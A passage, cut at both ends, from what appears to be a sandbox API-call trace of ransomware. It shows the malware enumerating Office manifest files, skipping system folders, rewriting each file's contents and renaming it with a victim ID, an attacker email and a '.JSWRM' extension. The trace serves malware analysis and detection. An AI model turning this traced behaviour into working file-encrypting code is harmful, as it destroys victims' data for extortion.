(lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.557] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0072.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0072.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.557] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=2147) returned 1 [0072.557] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x860) returned 0x23fc98 [0072.557] ReadFile (in: hFile=0x458, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345ef6c*=0x860, lpOverlapped=0x0) returned 1 [0072.559] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.559] WriteFile (in: hFile=0x458, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345ef68*=0x860, lpOverlapped=0x0) returned 1 [0072.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0072.559] CloseHandle (hObject=0x458) returned 1 [0072.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0072.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0072.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.560] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.560] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf982bd9c, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf982bd9c, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x34b4b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP8AF5~1.XML")) returned 1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.560] lstrcmpiW (lpString1="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0072.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0072.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.562] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=215883) returned 1 [0072.562] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.562] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.573] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.573] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.574] CloseHandle (hObject=0x458) returned 1 [0072.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0072.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0072.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.574] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.575] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", cAlternateFileName="APF26A~1.XML")) returned 1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.575] lstrcmpiW (lpString1="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0072.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0072.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0072.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0072.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0072.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.627] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.627] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.627] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.629] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.629] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.629] CloseHandle (hObject=0x458) returned 1 [0072.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0072.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0072.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.630] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0072.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 